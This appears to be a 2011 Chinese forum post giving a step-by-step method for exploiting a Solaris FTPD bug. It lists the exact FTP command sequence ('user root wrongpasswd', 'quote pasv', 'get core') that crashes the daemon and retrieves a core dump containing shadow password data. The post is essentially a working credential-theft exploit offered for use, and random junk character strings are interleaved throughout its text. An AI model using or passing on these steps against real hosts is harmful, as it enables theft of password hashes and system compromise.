該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG�,使得用戶可以獲得該機(jī)的口令文件。具體過程如下:
! Q$ T2 W P3 [" q: I% B( C! H, x t- h# v4 _/ w" Z. x4 l
1.通過 ftp 正常登錄到目的主機(jī)上
; ^( j5 {9 \ e9 Z8 n& I. r( {* r+ ?: j0 @
2.輸入如下命令序列:( I" ~. G R: n1 b
3 T5 c7 O: K3 V' Gftp> user root wrongpasswd* s1 F4 q9 |& q' o5 J) A6 A' U
Q3 w+ d0 E* z# p$ S6 Cftp> quote pasv
+ [! I. e3 Q7 d) i9 s, F: L$ s) y6 |6 _( a. h* q4 y) Y* ?6 E/ e
3.這時(shí)���,ftpd會(huì)報(bào)錯(cuò)退出�,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core�,口令文件就包含在這個(gè)core中。: Z( |( v. h& A v" h
% v( r# A0 u: t- ~9 J
4.再次進(jìn)入FTP >get core3 L$ F6 R% o8 y: I& _: t
6 Q* e S9 X7 N$ \補(bǔ)充:雖然在core只有一部分shadow�,但是對(duì)于系統(tǒng)來說已經(jīng)是致命的打擊了
. \% r Z9 H4 ~ n* j' m- t* ~8 j: d( F8 n' D3 ?5 `8 e
|
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡